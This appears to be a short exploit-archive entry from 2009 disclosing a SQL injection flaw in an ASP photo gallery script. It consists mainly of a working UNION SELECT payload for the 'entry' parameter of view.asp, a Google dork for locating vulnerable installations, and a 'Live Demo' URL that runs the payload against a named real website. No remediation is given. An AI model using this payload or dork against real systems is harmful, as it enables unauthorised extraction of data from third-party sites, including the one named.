id: 4819
date: 02/09/2009
title: A Better Member-Based ASP Photo Gallery (entry) SQL Injection Vuln
author: BackDoor
cves: 

==================================================================
A Better Member-Based ASP Photo Gallery (entry) SQL Injection Vuln
==================================================================


Script:A Better Member-Based ASP Photo Gallery
Download:
http://www.ontarioabandonedplaces.com/ipguardian/ABetterMemberBasedASPPhotoGallery.zip
Demo:
www.ontarioabandonedplaces.com/ipguardian/gallery
Exploit:www.target.com/scriptpath/view.asp?entry=-1+union+select+0,title,2,creator,Longitude,5,pics+from+photos
Dork:intitle:"A Better ASP User Gallery"
Live Demo:
www.ontarioabandonedplaces.com/ipguardian/gallery/view.asp?entry=-1+union+select+0,title,2,creator,Longitude,5,pics+from+photos



#  0day.today [2023-03-23]  #